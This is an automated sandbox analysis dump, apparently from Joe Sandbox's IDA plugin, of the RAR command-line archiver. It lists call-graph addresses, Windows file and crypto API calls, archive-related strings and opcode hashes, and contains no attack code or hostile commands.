7ff7f7e873f5 memcpy_s 39447->39448 39662 7ff7f7ea894c 39447->39662 39450 7ff7f7e99be0 14 API calls 39448->39450 39451 7ff7f7e81a01 39450->39451 39451->39305 39453 7ff7f7e87539 39452->39453 39688 7ff7f7eb922c 39453->39688 39457 7ff7f7e96d45 39456->39457 39458 7ff7f7e96cbc 39456->39458 39459 7ff7f7e96d83 39457->39459 39462 7ff7f7e96d69 39457->39462 39704 7ff7f7eb9f78 8 API calls 2 library calls 39457->39704 39460 7ff7f7e96cd9 39458->39460 39699 7ff7f7eb9f78 8 API calls 2 library calls 39458->39699 39459->39316 39461 7ff7f7e96cf3 39460->39461 39700 7ff7f7eb9f78 8 API calls 2 library calls 39460->39700 39465 7ff7f7e96d0d 39461->39465 39701 7ff7f7eb9f78 8 API calls 2 library calls 39461->39701 39462->39459 39705 7ff7f7eb9f78 8 API calls 2 library calls 39462->39705 39469 7ff7f7e96d2b 39465->39469 39702 7ff7f7eb9f78 8 API calls 2 library calls 39465->39702 39469->39459 39703 7ff7f7eb9f78 8 API calls 2 library calls 39469->39703 39473 7ff7f7e87167 39472->39473 39474 7ff7f7e87162 39472->39474 39706 7ff7f7e86c64 130 API calls _handle_error 39474->39706 39476->39293 39477->39286 39478->39288 39479->39296 39480->39299 39481->39297 39482->39416 39484 7ff7f7e83231 39483->39484 39488 7ff7f7e832e9 39483->39488 39484->39488 39532 7ff7f7e94380 14 API calls 39484->39532 39486 7ff7f7e8329c 39486->39488 39533 7ff7f7ea2a20 22 API calls 2 library calls 39486->39533 39488->39429 39490 7ff7f7e970a4 39489->39490 39491 7ff7f7e970c5 39490->39491 39534 7ff7f7ea8558 10 API calls 2 library calls 39490->39534 39491->39429 39535 7ff7f7e86714 39493->39535 39495 7ff7f7e86836 39496 7ff7f7e86853 39495->39496 39546 7ff7f7ee48c0 31 API calls _invalid_parameter_noinfo 39495->39546 39496->39429 39498 7ff7f7e8684b 39498->39496 39499 7ff7f7e868a9 std::bad_alloc::bad_alloc 39498->39499 39547 7ff7f7edba34 RtlPcToFileHeader RaiseException 39499->39547 39501 7ff7f7e868c4 39548 7ff7f7e87188 12 API calls 39501->39548 39503 7ff7f7e868eb 39503->39429 39509 7ff7f7ec7a4f 39504->39509 39510 7ff7f7ec7a59 39504->39510 39505 7ff7f7ec7a7c 39585 7ff7f7ecb6d0 73 API calls _Init_thread_footer 39505->39585 39508 7ff7f7ec7b1c 60 API calls 39508->39510 39509->39429 39510->39505 39510->39508 39510->39509 39553 7ff7f7ec71fc 39510->39553 39586 7ff7f7e941b0 14 API calls 2 library calls 39510->39586 39513 7ff7f7e86ee6 39512->39513 39518 7ff7f7e86f5c 39512->39518 39634 7ff7f7ec9f64 8 API calls memcpy_s 39513->39634 39515 7ff7f7e86efb 39516 7ff7f7e86f2f 39515->39516 39515->39518 39516->39515 39635 7ff7f7e87188 12 API calls 39516->39635 39518->39428 39520 7ff7f7ec6fb4 39519->39520 39522 7ff7f7ec6f8a 39519->39522 39521 7ff7f7ea4538 FindClose 39521->39522 39522->39520 39522->39521 39524 7ff7f7e85742 39523->39524 39526 7ff7f7e8575d 39523->39526 39524->39526 39640 7ff7f7eb3520 12 API calls 2 library calls 39524->39640 39636 7ff7f7eb3610 39526->39636 39529 7ff7f7e857fc 39529->39429 39530 7ff7f7eb48bc 8 API calls 39530->39529 39531->39429 39532->39486 39533->39488 39534->39490 39536 7ff7f7e86738 39535->39536 39545 7ff7f7e867a7 memcpy_s 39535->39545 39537 7ff7f7e86765 39536->39537 39549 7ff7f7e9ca6c 48 API calls 3 library calls 39536->39549 39540 7ff7f7e86786 39537->39540 39542 7ff7f7e867e1 39537->39542 39539 7ff7f7e86759 39550 7ff7f7e9cb64 8 API calls 39539->39550 39540->39545 39551 7ff7f7e9cb64 8 API calls 39540->39551 39542->39545 39552 7ff7f7e9cb64 8 API calls 39542->39552 39545->39495 39546->39498 39547->39501 39548->39503 39549->39539 39558 7ff7f7ec7217 setbuf 39553->39558 39554 7ff7f7eda610 _handle_error 8 API calls 39556 7ff7f7ec776f 39554->39556 39556->39510 39568 7ff7f7ec729c 39558->39568 39576 7ff7f7ec725a 39558->39576 39579 7ff7f7ec73c5 39558->39579 39594 7ff7f7ea4554 39558->39594 39559 7ff7f7ec7453 39561 7ff7f7ec7476 39559->39561 39562 7ff7f7ec7464 39559->39562 39580 7ff7f7ec7496 39561->39580 39591 7ff7f7ea4538 39561->39591 39602 7ff7f7ec7c38 55 API calls 3 library calls 39562->39602 39565 7ff7f7ec7342 39565->39576 39581 7ff7f7ec7656 39565->39581 39584 7ff7f7ec76ef 39565->39584 39603 7ff7f7e94380 14 API calls 39565->39603 39566 7ff7f7ec7471 39566->39561 39570 7ff7f7ec73bb 39568->39570 39572 7ff7f7ec732e 39568->39572 39571 7ff7f7eda444 new 4 API calls 39570->39571 39571->39579 39572->39565 39573 7ff7f7ec734a 39572->39573 39575 7ff7f7ec737e 39573->39575 39573->39576 39600 7ff7f7e94380 14 API calls 39573->39600 39574 7ff7f7ea4554 16 API calls 39574->39576 39575->39576 39601 7ff7f7e9cbd0 75 API calls 39575->39601 39576->39554 39587 7ff7f7ea45cc 39579->39587 39580->39574 39580->39576 39581->39576 39581->39581 39582 7ff7f7ec7723 39581->39582 39581->39584 39604 7ff7f7e8c214 8 API calls 2 library calls 39582->39604 39584->39576 39605 7ff7f7ea8558 10 API calls 2 library calls 39584->39605 39586->39510 39588 7ff7f7ea45ed 39587->39588 39589 7ff7f7ea46ec 15 API calls 39588->39589 39590 7ff7f7ea46b2 39588->39590 39589->39588 39590->39559 39590->39565 39592 7ff7f7ea454f 39591->39592 39593 7ff7f7ea4549 FindClose 39591->39593 39592->39580 39593->39592 39595 7ff7f7ea4570 39594->39595 39596 7ff7f7ea4574 39595->39596 39606 7ff7f7ea46ec 39595->39606 39596->39568 39599 7ff7f7ea458d FindClose 39599->39596 39600->39575 39601->39576 39602->39566 39603->39581 39604->39576 39605->39576 39607 7ff7f7ea4705 setbuf 39606->39607 39608 7ff7f7ea47a4 FindNextFileW 39607->39608 39609 7ff7f7ea4733 FindFirstFileW 39607->39609 39610 7ff7f7ea47ae GetLastError 39608->39610 39618 7ff7f7ea478b 39608->39618 39611 7ff7f7ea4749 39609->39611 39609->39618 39610->39618 39619 7ff7f7eb4534 39611->39619 39614 7ff7f7eda610 _handle_error 8 API calls 39615 7ff7f7ea4587 39614->39615 39615->39596 39615->39599 39616 7ff7f7ea475f FindFirstFileW 39617 7ff7f7ea477a GetLastError 39616->39617 39616->39618 39617->39618 39618->39614 39620 7ff7f7eb4549 setbuf 39619->39620 39630 7ff7f7eb45a2 39620->39630 39631 7ff7f7eb472c CharUpperW 39620->39631 39622 7ff7f7eb4579 39632 7ff7f7eb4760 CharUpperW 39622->39632 39623 7ff7f7eda610 _handle_error 8 API calls 39624 7ff7f7ea475b 39623->39624 39624->39616 39624->39617 39626 7ff7f7eb4592 39627 7ff7f7eb4629 GetCurrentDirectoryW 39626->39627 39628 7ff7f7eb459a 39626->39628 39627->39630 39633 7ff7f7eb472c CharUpperW 39628->39633 39630->39623 39631->39622 39632->39626 39633->39630 39634->39515 39635->39516 39637 7ff7f7eb3626 setbuf wcschr 39636->39637 39638 7ff7f7eda610 _handle_error 8 API calls 39637->39638 39639 7ff7f7e857e1 39638->39639 39639->39529 39639->39530 39640->39526 39642 7ff7f7e98919 39641->39642 39667 7ff7f7ec4b14 39642->39667 39644 7ff7f7e98954 memcpy_s 39644->39441 39646 7ff7f7eb9199 39645->39646 39647 7ff7f7eda480 4 API calls 39646->39647 39648 7ff7f7eb91be 39647->39648 39649 7ff7f7eda444 new 4 API calls 39648->39649 39650 7ff7f7eb91cf 39649->39650 39651 7ff7f7eb91e1 39650->39651 39652 7ff7f7e988dc 8 API calls 39650->39652 39653 7ff7f7eda444 new 4 API calls 39651->39653 39652->39651 39654 7ff7f7eb91f7 39653->39654 39655 7ff7f7eb9209 39654->39655 39656 7ff7f7e988dc 8 API calls 39654->39656 39655->39443 39656->39655 39658 7ff7f7e988dc 8 API calls 39657->39658 39659 7ff7f7eb7063 39658->39659 39660 7ff7f7eb72c0 4 API calls 39659->39660 39661 7ff7f7e87325 39660->39661 39661->39446 39661->39448 39672 7ff7f7ec7d80 39662->39672 39668 7ff7f7ec4b26 39667->39668 39669 7ff7f7ec4b2b 39667->39669 39671 7ff7f7ec4b38 8 API calls _handle_error 39668->39671 39669->39644 39671->39669 39679 7ff7f7ec8094 39672->39679 39675 7ff7f7ea8a44 39676 7ff7f7ea8a5a memcpy_s 39675->39676 39683 7ff7f7ecbac4 39676->39683 39680 7ff7f7ec809f 39679->39680 39681 7ff7f7ec7ec8 68 API calls 39680->39681 39682 7ff7f7ea896e 39681->39682 39682->39675 39686 7ff7f7ecba70 GetCurrentProcess GetProcessAffinityMask 39683->39686 39687 7ff7f7ea89c5 39686->39687 39687->39448 39689 7ff7f7eb9245 39688->39689 39696 7ff7f7ea6194 72 API calls 39689->39696 39691 7ff7f7eb92b1 39697 7ff7f7ea6194 72 API calls 39691->39697 39693 7ff7f7eb92bd 39698 7ff7f7ea6194 72 API calls 39693->39698 39695 7ff7f7eb92c9 39696->39691 39697->39693 39698->39695 39699->39460 39700->39461 39701->39465 39702->39469 39703->39457 39704->39462 39705->39459 39706->39473 39707 7ff7f7e83b53 39708 7ff7f7e83b64 39707->39708 39757 7ff7f7ea1e80 39708->39757 39709 7ff7f7e83bb6 39711 7ff7f7e83c18 39709->39711 39713 7ff7f7e83c01 39709->39713 39718 7ff7f7e83c09 39709->39718 39774 7ff7f7e88050 157 API calls 39711->39774 39715 7ff7f7ea1c24 12 API calls 39713->39715 39714 7ff7f7e83c3d 39775 7ff7f7e88010 13 API calls 39714->39775 39715->39718 39717 7ff7f7e83ccc 39737 7ff7f7e83c90 39717->39737 39782 7ff7f7ea2414 61 API calls 39717->39782 39769 7ff7f7ea23f0 39718->39769 39719 7ff7f7e83c45 39722 7ff7f7e83c54 39719->39722 39776 7ff7f7e9cba8 75 API calls 39719->39776 39777 7ff7f7e8a9d4 186 API calls wcschr 39722->39777 39723 7ff7f7e83cf9 39783 7ff7f7ea1998 138 API calls 39723->39783 39727 7ff7f7e83c5c 39778 7ff7f7e893ac 8 API calls 39727->39778 39728 7ff7f7e83d10 39730 7ff7f7ea18ac 15 API calls 39728->39730 39730->39737 39731 7ff7f7e83c66 39733 7ff7f7e83c77 39731->39733 39779 7ff7f7e9ca40 61 API calls _CxxThrowException 39731->39779 39780 7ff7f7e88090 8 API calls 39733->39780 39736 7ff7f7e83c7f 39736->39737 39781 7ff7f7e9ca40 61 API calls _CxxThrowException 39736->39781 39784 7ff7f7ecd400 48 API calls 39737->39784 39758 7ff7f7ea1e95 setbuf 39757->39758 39759 7ff7f7ea1ecb CreateFileW 39758->39759 39760 7ff7f7ea1f59 GetLastError 39759->39760 39761 7ff7f7ea1fb8 39759->39761 39763 7ff7f7eb4534 10 API calls 39760->39763 39762 7ff7f7ea1ff7 39761->39762 39764 7ff7f7ea1fd9 SetFileTime 39761->39764 39766 7ff7f7eda610 _handle_error 8 API calls 39762->39766 39765 7ff7f7ea1f74 39763->39765 39764->39762 39765->39761 39767 7ff7f7ea1f78 CreateFileW GetLastError 39765->39767 39768 7ff7f7ea203a 39766->39768 39767->39761 39768->39709 39785 7ff7f7ea24e8 39769->39785 39772 7ff7f7ea240e 39772->39717 39774->39714 39775->39719 39777->39727 39778->39731 39779->39733 39780->39736 39781->39737 39782->39723 39783->39728 39791 7ff7f7ea1af0 39785->39791 39788 7ff7f7ea23f9 39788->39772 39790 7ff7f7e9ca40 61 API calls _CxxThrowException 39788->39790 39790->39772 39792 7ff7f7ea1b01 setbuf 39791->39792 39793 7ff7f7ea1b6f CreateFileW 39792->39793 39795 7ff7f7ea1b68 39792->39795 39793->39795 39794 7ff7f7ea1be1 39799 7ff7f7eda610 _handle_error 8 API calls 39794->39799 39795->39794 39796 7ff7f7eb4534 10 API calls 39795->39796 39797 7ff7f7ea1bb3 39796->39797 39797->39794 39798 7ff7f7ea1bb7 CreateFileW 39797->39798 39798->39794 39800 7ff7f7ea1c14 39799->39800 39800->39788 39801 7ff7f7e9ca08 10 API calls 39800->39801 39801->39788 39802 7ff7f7e83e71 39803 7ff7f7e83e81 39802->39803 39806 7ff7f7e83e89 39802->39806 39813 7ff7f7ed9a14 49 API calls 39803->39813 39805 7ff7f7e83edd 39808 7ff7f7eda610 _handle_error 8 API calls 39805->39808 39806->39805 39807 7ff7f7e83ea3 39806->39807 39814 7ff7f7ea331c 48 API calls 2 library calls 39807->39814 39810 7ff7f7e83eef 39808->39810 39811 7ff7f7e83eab 39811->39805 39815 7ff7f7e863e8 8 API calls 2 library calls 39811->39815 39813->39806 39814->39811 39815->39805
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                        • API String ID: 0-1628410872
                                                        • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                        • Instruction ID: 5f46bedba4ec908d380c6190ba0fe4388caf2bb489ce7eafa6ab7e8208914796
                                                        • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                        • Instruction Fuzzy Hash: 32C2937BA0C19281EB64BB2481441BDA7B2AF41794FD98137CA2F4A2C5DE6DE547C3F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                        • API String ID: 0-1660254149
                                                        • Opcode ID: 59f059c4cc9d4195e5f6367a44b98e72212f092c60365ea5baa1427c1cebaa58
                                                        • Instruction ID: 44310c2826a3df9b50e28ac2005ff8a553384d608226f3a787f3ec6038006849
                                                        • Opcode Fuzzy Hash: 59f059c4cc9d4195e5f6367a44b98e72212f092c60365ea5baa1427c1cebaa58
                                                        • Instruction Fuzzy Hash: 53E2D32AA09AC285EB20EF25D8402FDA7A5FB45788F854037CA6E077D6DF3DD546C390

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$FileFreeModuleNameVersion
                                                        • String ID: rarlng.dll
                                                        • API String ID: 2520153904-1675521814
                                                        • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                        • Instruction ID: 80bc950322ee779455e63fd7d5d51ef5abc6062c6e7bf85ff00dcbada023387e
                                                        • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                        • Instruction Fuzzy Hash: D7319239618A52C5FB24AF25E8406E8A7A0FB45798FC04037EA6E43AD4DF3CD54BC790

                                                        Control-flow Graph

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA4736
                                                        • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA476B
                                                        • GetLastError.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA477A
                                                        • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA47A4
                                                        • GetLastError.KERNEL32(?,00000000,?,?,00007FF7F7EA4620,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA47B2
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast$Next
                                                        • String ID:
                                                        • API String ID: 869497890-0
                                                        • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                        • Instruction ID: 4403eecbdb54f42d2b16d8cb92492dd164810f46941a43252593ea889150529d
                                                        • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                        • Instruction Fuzzy Hash: 7541EA3A70868196EB64AB29E5402E8A350FB497B4F800332FA7E437C5DF6CD15AC350
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID:
                                                        • API String ID: 1815803762-0
                                                        • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                        • Instruction ID: d135c4af46920bf6009c323af5bb0a46ea531c90b5e132700632694fbb740d61
                                                        • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                        • Instruction Fuzzy Hash: F301622AB0865082E7409B16A844779A761EBD4FD4F988432DE6E43BA4CF7DD5468740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Char
                                                        • String ID:
                                                        • API String ID: 751630497-0
                                                        • Opcode ID: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                        • Instruction ID: 80638a42fe03ae14db6ab500a0e36d417cab69a93fdde81ea1816a2fa616a4f6
                                                        • Opcode Fuzzy Hash: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                        • Instruction Fuzzy Hash: DF22A136A086C296E714EF34D4401FEBBA0FB50748F884137DA5E5A2D9DE7CE952C7A0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1de8636332a38a84dbc9f6d867c902366e91941da8db13d16de16ab686187439
                                                        • Instruction ID: 6a1927a304627c8f2f9e005b15bc8da6ea3b3208f6152cbc14a0bd551a9ec218
                                                        • Opcode Fuzzy Hash: 1de8636332a38a84dbc9f6d867c902366e91941da8db13d16de16ab686187439
                                                        • Instruction Fuzzy Hash: 6871EF32B0568186D704EF35E4456EDB391FB88B98F084136CB6E8B3D9DF7CA44287A0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
